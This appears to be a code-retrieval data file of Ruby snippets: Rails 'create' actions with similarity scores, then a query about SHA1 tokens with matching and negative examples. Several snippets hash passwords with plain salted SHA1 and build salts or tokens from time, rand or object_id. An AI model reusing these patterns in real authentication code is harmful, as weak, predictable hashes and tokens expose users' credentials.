"def create\n @item = Item.new(item_save_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n \n if @item.save\n redirect_to @item\n else\n render :new\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n item = Item.new(item_params)\n item.done = \"0\"\n item.trash = \"0\"\n\n if item.save\n render json: {data:item}, status: :created\n else\n render json: {data:item}, status: :unprocessable_entity\n end\n end",
"def create\n @item = Item.new(item_params)\n \n respond_to do |format|\n if @item.save \n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: \"Item was successfully created.\" }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_item(name, price)\r\n new_item = Trading::Item.created( name, price, self )\r\n self.item_list.push(new_item) # AK You can also do `item_list << new_item`\r\n return new_item\r\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to '/items', notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n create_params = item_params\n item = Item.new(\n name: create_params[:name], \n is_complete: false, #create_params[:is_complete], \n list_id: create_params[:list_id])\n\n item.save!\n render json: item\n end",
"def create_item(data_bag, item_name, data = {}, metadata = {})\n item = ::SecureDataBag::Item.new(metadata)\n item.raw_data = { 'id' => item_name }.merge(data)\n item.data_bag data_bag\n item\n end",
"def create\n @request_item = RequestItem.new(request_item_params)\n @request_item.item = Item.new(name: params[:request_item][:item][:name])\n\n if @request_item.save\n render json: @request_item \n else\n render json: @request_item.errors, status: :bad_request\n end\n end",
"def create(params = {})\n record = new(params)\n record.save && record\n end",
"def create(options)\n item = build(options)\n item.save\n item\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to root_url, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, item: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_record!(hash, inventory_object)\n record = inventory_collection.model_class.create!(hash.except(:id))\n inventory_collection.store_created_records(record)\n\n inventory_object.id = record.id\n end",
"def item_create\n @item = Item.new(item_params)\n respond_to do |format|\n if @item.save\n format.html { redirect_to item_index_path, notice: 'O item foi criado com sucesso.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :item_new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add(product)\n items.create(product: product)\n end",
"def generate_new_item_object\n @new_item = Flight.new\n insert_required_params_into_new_item_object\n insert_default_params_into_new_item_object\n insert_optional_params_into_new_item_object(self)\n return @new_item\n end",
"def create\n @item = current_owner.items.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to items_path, notice: 'Item was created successfully' }\n format.json { render :show, status: :created, location: items_path }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_item(iid, itypes, params={})\n params.merge!(default_params)\n params['pio_iid'] = iid\n format_itypes(itypes, params)\n extract_latlng(params)\n extract_startend(params)\n @connection.post(:items, params).body\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n flash[:notice] = 'Item was successfully created.'\n format.html { redirect_to(@item) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n flash[:notice] = 'Item was successfully created.'\n format.html { redirect_to(@item) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to(@item, :notice => 'Item was successfully created.') }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to(@item, :notice => 'Item was successfully created.') }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n if !self.auth_admin\n @item = Item.new(item_params)\n respond_to do |format|\n if @item.save\n format.html { redirect_to item_path(@item), notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n end\n end\n end\n end",
"def create\n item = Item.new(item_params)\n item.user = current_user\n if item.save\n render json: item\n else\n render json: {errors: item.errors}, status: :unprocessable_entity\n end\n end",
"def create\n @item = Item.new(item_params)\n\n if @item.save\n render json: @item\n else\n render json: { error: t('story_create_error') }, status: :unprocessable_entity\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to(items_path) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { redirect_to(items_path)}\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n # The item is either \"Local\" or \"Remote\" depending on the source selected\n @item = Item.factory(params[:source], params[@hash_key.to_sym])\n \n respond_to do |format|\n if @item.save\n flash[:notice] = 'Item was successfully created.'\n format.html { redirect_to(item_url(@item)) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @user = User.find(current_user.id)\n @item = @user.items.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to '/items', notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(attrs = {})\n record = new(attrs)\n record.save\n record\n end",
"def create!(name, params = {})\n item = build(name, params)\n item.save!\n item\nend",
"def create\n @item = Item.new(params[:item])\n @item.save\n respond_with @item\n end",
"def create\n @item = Item.new(item_params)\n if @item.save\n flash[:success] = \"項目已新增!\"\n redirect_to root_url\n else\n flash[:danger] = \"新增失敗!\"\n @submit_text = \"新增\"\n render 'new'\n end\n end",
"def create_item(location_id, body, opts = {})\n data, _status_code, _headers = create_item_with_http_info(location_id, body, opts)\n return data\n end",
"def create\n @itemstore = ItemStore.new(item_store_params)\n\n respond_to do |format|\n if @itemstore.save\n format.html { redirect_to @itemstore, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @itemstore }\n else\n format.html { render :new }\n format.json { render json: @itemstore.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_todo_item(title, description)\n new_item = Todoitem.new\n new_item.title = title\n new_item.description = description\n new_item.save\n end",
"def create\n @data_item = DataItem.new(data_item_params)\n\n respond_to do |format|\n if @data_item.save\n format.html { redirect_to @data_item, notice: 'Data item was successfully created.' }\n format.json { render :show, status: :created, location: @data_item }\n else\n format.html { render :new }\n format.json { render json: @data_item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(atts = {})\n rec = self.new(atts)\n rec.save && rec\n end",
"def newitem\n entry = Pages::Storage::Entry.new(self)\n\n entry.title = ''\n entry.tags = []\n entry.date = Time.new\n entry.content = ''\n entry.draft = false\n\n @items << entry\n\n return entry\n end",
"def create\n data = CatalogItem.new(name: params[:name], description: params[:description])\n data.save\n render json: data\n end",
"def create\n cart_uuid = params[:cart_id]\n @item = Item.new(item_params.merge(cart_uuid: cart_uuid))\n if @item.save\n render json: @item, status: 201\n else\n render_errors 400, @item.errors.full_messages\n end\n end",
"def create\n @item = Item.create(item_params)\n @items = List.find(item_params[:list_id]).items.order(\"id ASC\")\n @list_id = item_params[:list_id]\n end",
"def create\n @item = @list.items.create(item_params)\n redirect_to @list\n end",
"def create(opts)\n opts = check_params(opts,[:items])\n super(opts)\n end",
"def create\n @rentable_item = RentableItem.new(rentable_item_params)\n @rentable_item.save\n end",
"def create(item_attrs = {})\n body = { value: item_attrs }\n Iterable.request(conf, base_path).put(body)\n end"
] |
[
"0.71818566",
"0.70745796",
"0.706473",
"0.6996472",
"0.6975625",
"0.695367",
"0.6938458",
"0.69055516",
"0.68687993",
"0.68202734",
"0.6817313",
"0.6815403",
"0.6807482",
"0.68023145",
"0.67395693",
"0.67165935",
"0.67165935",
"0.67165935",
"0.66843593",
"0.66820943",
"0.668136",
"0.66793805",
"0.66718817",
"0.667014",
"0.66676474",
"0.6665018",
"0.66574043",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.66503215",
"0.66206294",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.6618512",
"0.66149503",
"0.6601659",
"0.65982336",
"0.65965325",
"0.6585502",
"0.65826994",
"0.65791196",
"0.65654665",
"0.65595484",
"0.65595484",
"0.65595484",
"0.65595484",
"0.65595484",
"0.65580666",
"0.65476495",
"0.65462023",
"0.65317416",
"0.6528373",
"0.65169334",
"0.65044874",
"0.6494746",
"0.6494746",
"0.64898366",
"0.64898366",
"0.6487314",
"0.64494735",
"0.644896",
"0.6431005",
"0.64175165",
"0.64136773",
"0.64130485",
"0.64082164",
"0.6398675",
"0.63926196",
"0.6392346",
"0.63895977",
"0.6388677",
"0.6381697",
"0.63786274",
"0.6378275",
"0.63750553",
"0.6359658",
"0.63549554",
"0.63546836",
"0.63447565",
"0.63420236",
"0.6341523"
] |
0.7281687
|
0
|
SHA1 from random salt and time
|
def generate_access_token
self.access_token = Digest::SHA1.hexdigest("#{random_salt}#{Time.now.to_i}")
end
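
A minimal runnable sketch of the token pattern above, assuming a hypothetical random_salt helper (not defined in this record). Note that hashing a salt plus a second-granularity timestamp adds little entropy beyond the salt itself, so the salt is doing all the security work here:

require 'digest'
require 'securerandom'

# Hypothetical salt source; the record above does not define random_salt.
def random_salt
  SecureRandom.hex(8)
end

# Same shape as the document: SHA1 over salt + Unix time, returned as hex.
def generate_access_token
  Digest::SHA1.hexdigest("#{random_salt}#{Time.now.to_i}")
end

puts generate_access_token # => 40-character hex string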
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_salt\n d = Digest::SHA1.new\n now = Time.now\n d.update(now.to_s)\n d.update(String(now.usec))\n d.update(String(rand(0)))\n d.update(String($$))\n d.update('wxtengu.net')\n d.hexdigest\n end",
"def generate_salt\n Digest::SHA1.hexdigest(Time.now.to_f.to_s)\n end",
"def generate_salt\n Digest.hexencode(Digest::SHA1.digest(\n \"#{rand(2 ** 128) * ( Time.now.to_i * Process.pid)}\"))\n end",
"def to_sha1(salt = \"\")\n hashsum(:sha1, salt)\n end",
"def sha1_hex\n Digest::SHA1.hexdigest(salted_name)\n end",
"def generate_salt\n return hash(\n Time.now.to_s,\n rand(999_999_999).to_s,\n Time.now.usec\n )\n end",
"def make_salt\n\t secure_hash(\"#{Time.now.utc}--#{password}\")\n\tend",
"def make_salt\n secure_hash(\"#Time.now.utc}--#{password}\")\n end",
"def create_new_salt\n self.salt = Digest::SHA256.hexdigest(Time.now.to_s + rand.to_s)\n end",
"def create_new_salt\n self.salt = Digest::SHA256.hexdigest(Time.now.to_s + rand.to_s)\n end",
"def make_salt\n secure_hash(\"#{Time.now.utc}--#{password}\")\n end",
"def make_salt\n secure_hash(\"#{Time.now.utc}--#{password}\")\n end",
"def make_salt\n secure_hash(\"#{Time.now.utc}--#{password_digest}\")\n end",
"def make_salt\r\n self.salt = sha_hash(\"#(Time.now.to_s)--#(self.password)\")\r\n end",
"def salt\n # 72 bits\n SecureRandom.hex(9)\n end",
"def generate_salt\n salt = \"\"\n 64.times { \n salt << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr }\n salt\n end",
"def sha1; end",
"def sha1; end",
"def generate_salt\n @salt = self.object_id.to_s + rand.to_s\n end",
"def generate_salt\n self.salt = self.object_id.to_s + rand.to_s\n end",
"def create_new_salt\n self.salt = self.object_id.to_s + rand.to_s\n end",
"def create_new_salt\n self.salt = self.object_id.to_s + rand.to_s\n end",
"def rand_salt\n result = ''\n salt().length.times {result << salt()[rand(salt().length),1]}\n result\n end",
"def salt() 'monkeynutzzSfaKT7CwImCHCH8Ow' end",
"def create_new_salt\n\t\tself.salt = self.object_id.to_s + rand.to_s\n end",
"def generate_salt\n self.salt = SecureRandom.base64(8)\n end",
"def create_new_salt \n self.password_salt = self.object_id.to_s + rand.to_s\n end",
"def calc_x(username, password, salt)\n spad = if salt.length.odd? then '0' else '' end\n sha1_hex(spad + salt + sha1_str([username, password].join(':'))).hex\n end",
"def get_salt\n [Array.new(6){rand(256).chr}.join].pack(\"m\" ).chomp\n end",
"def create_new_salt\n self.password_salt = [Array.new(6){rand(256).chr}.join].pack(\"m\").chomp\n end",
"def make_token\r\n # From the restful-authentication plug-in\r\n args = [ Time.now, (1..10).map{ rand.to_s } ]\r\n Digest::SHA1.hexdigest(args.flatten.join('--'))\r\n end",
"def create_new_salt\n\t\t(self.salt = self.object_id.to_s + rand.to_s) if self.salt.nil?\n\tend",
"def create_salt()\n size=10\n pool = ('a'..'z').to_a + ('0'..'9').to_a\n self.salt= (1..size).collect{|a| pool[rand(pool.size)]}.join\n end",
"def create_hash(user_pw)\n return Digest::SHA1.hexdigest(user_pw)\nend",
"def sha1_base64\n str = Base64.encode64(Digest::SHA1.digest(salted_name)).strip\n str.tr('+/', '-_').gsub(/=/,'')\n end",
"def generate_token(pass, salt)\n Digest::SHA256.hexdigest(pass + salt)\n end",
"def create_salt\n\t\t\tself.password_seed = self.object_id.to_s + rand.to_s\n\t\tend",
"def build_hash_code\n\t\tSecureRandom.hex(8) + (Time.now.to_f * 1000).to_i.to_s\n\tend",
"def generate_salt\n salt_time = (ENV['RACK_ENV'] == 'test' ? 0.01 : 1.25)\n self[:salt] = SCrypt::Engine.generate_salt(max_time: salt_time)\n end",
"def short_sha1(length=7)\n sha1[0, length]\n end",
"def short_sha1(length=7)\n sha1[0, length]\n end",
"def to_sha1(length = 40)\n Digest::SHA1.hexdigest(self)[0,length]\n end",
"def send_salt( session, user )\n salt = Digest::MD5.hexdigest( user + Time.now.strftime('%M%S') + rand(300).to_s )\n session.puts salt\n return salt\n end",
"def generate_digest\n Digest::SHA512.hexdigest(\"#{Time.now.usec}#{rand(100)}#{Session.secret}\")\n end",
"def gen_salt\n chars = []\n 8.times { chars << SALT_CHARS[rand(SALT_CHARS.size)] }\n chars.join('') \n end",
"def make_hash\n chars = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n string = \"\"\n 20.times do\n string << chars[rand(chars.size-1)]\n end\n hash = Digest::SHA2.hexdigest(string)\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(password + salt)\n end",
"def hex_sha1(s)\n binb2hex(core_sha1(str2binb(s), s.length * $chrsz))\n end",
"def gen_salt\n chars = []\n 8.times { chars << SALT_CHARS[SecureRandom.random_number(SALT_CHARS.size)] }\n chars.join('')\n end",
"def pwdhash(salt=nil)\n salt = String.random_password.md5 if salt.nil?\n salt = salt[0..8]\n salt+(salt+self).sha1\n end",
"def hex_sha1(s)\n return binb2hex(core_sha1(str2binb(s), s.length * $chrsz))\n end",
"def sha1=(_); end",
"def code_salt\n 'fbbc13ed4a51e27608037365e1d27a5f992b6339'\n end",
"def init_salt\n self.salt = SecureRandom.hex(25) if self.salt.blank?\n end",
"def random_pbkdf2_salt\n encode_bytes(SecureRandom.random_bytes(16))\n end",
"def generate_code\n self.code = Digest::SHA1.hexdigest(\"--#{Time.now.to_s}--#{user_id}--#{rand(256)}\")[0,32]\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def sha1?; @sha1; end",
"def mutate_bcrypt_salt(_)\n 'au6lOASvp17AGsqkmE7'\n end",
"def make_activation_code\n self.activation_code = Digest::SHA1.hexdigest( Time.now.to_s.split(//).sort_by {rand}.join )\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def digest(string, options = {})\n salt = options[:salt] || SecureRandom.base64\n Digest::SHA1.hexdigest(\"#{salt}--#{string}\")\n end",
"def to_sha2(salt = \"\")\n hashsum(:sha2, salt)\n end",
"def token_and_salt\n today_string = Time.now.to_date.to_s\n return token_with_salt(today_string), today_string\n end",
"def createSHAHash(data)\n\t\treturn Digest::SHA1.digest(data)\n\tend",
"def sha1(string)\n\tOpenSSL::Digest::SHA1.hexdigest(string)\nend",
"def make_token\n secure_digest(Time.now, (1..10).map{ rand.to_s })\n end",
"def make_activation_code\n self.activation_code = Digest::SHA1.hexdigest( Time.now.to_s.split(//).sort_by {rand}.join )\n end",
"def make_password_reset_code\n self.password_reset_code = Digest::SHA1.hexdigest( Time.now.to_s.split(//).sort_by {rand}.join )\n end",
"def generate_nonce(time = Time.now)\n return Digest::MD5.hexdigest( time )\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--NaCl--#{password}--\")\n end",
"def calc_x(username, password, salt)\n sha512_hex(salt + sha512_str([username, password].join(':'))).hex\n end",
"def core_sha1(x, len)\n # append padding\n x[len >> 5] ||= 0\n x[len >> 5] |= 0x80 << (24 - len % 32)\n x[((len + 64 >> 9) << 4) + 15] = len\n\n w = Array.new(80, 0)\n a = 1_732_584_193\n b = -271_733_879\n c = -1_732_584_194\n d = 271_733_878\n e = -1_009_589_776\n\n # for(var i = 0; i < x.length; i += 16)\n i = 0\n while i < x.length\n olda = a\n oldb = b\n oldc = c\n oldd = d\n olde = e\n\n # for(var j = 0; j < 80; j++)\n j = 0\n while j < 80\n if j < 16\n w[j] = x[i + j] || 0\n else\n w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1)\n end\n\n t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)),\n safe_add(safe_add(e, w[j]), sha1_kt(j)))\n e = d\n d = c\n c = rol(b, 30)\n b = a\n a = t\n j += 1\n end\n\n a = safe_add(a, olda)\n b = safe_add(b, oldb)\n c = safe_add(c, oldc)\n d = safe_add(d, oldd)\n e = safe_add(e, olde)\n i += 16\n end\n [a, b, c, d, e]\n end",
"def get_crypto_salt_hex\n return @crypto_salt if ! @crypto_salt\n @crypto_salt.unpack(\"H*\")\n end",
"def generate_hash(id, raffle_number)\n Digest::SHA256.base64digest(id+ raffle_number)\nend",
"def digest_password\n token = nonce + timestamp + password\n Base64.encode64(Digest::SHA1.hexdigest(token)).chomp!\n end",
"def generate_salts\n @verify_salt = OpenSSL::Random.random_bytes(KEYLEN)\n @encrypt_salt = OpenSSL::Random.random_bytes(KEYLEN)\n end",
"def core_sha1(x, len)\n # append padding\n x[len >> 5] ||= 0\n x[len >> 5] |= 0x80 << (24 - len % 32)\n x[((len + 64 >> 9) << 4) + 15] = len\n\n w = Array.new(80, 0)\n a = 1732584193\n b = -271733879\n c = -1732584194\n d = 271733878\n e = -1009589776\n\n #for(var i = 0; i < x.length; i += 16)\n i = 0\n while(i < x.length)\n olda = a\n oldb = b\n oldc = c\n oldd = d\n olde = e\n\n #for(var j = 0; j < 80; j++)\n j = 0\n while(j < 80)\n if(j < 16) \n w[j] = x[i + j] || 0\n else \n w[j] = rol(w[j-3] ^ w[j-8] ^ w[j-14] ^ w[j-16], 1)\n end\n\n t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)),\n safe_add(safe_add(e, w[j]), sha1_kt(j)))\n e = d\n d = c\n c = rol(b, 30)\n b = a\n a = t\n j += 1\n end\n\n a = safe_add(a, olda)\n b = safe_add(b, oldb)\n c = safe_add(c, oldc)\n d = safe_add(d, oldd)\n e = safe_add(e, olde)\n i += 16\n end\n return [a, b, c, d, e]\n end",
"def sha1\n Digest::SHA1.hexdigest(subject.identification + 0.chr + source)\n end",
"def authenticatable_salt; end",
"def salt\n return NSEC3.encode_salt(@salt)\n end",
"def sign_user_token(email, salt)\n Digest::MD5.hexdigest(\"#{email}:#{salt}\")\n end",
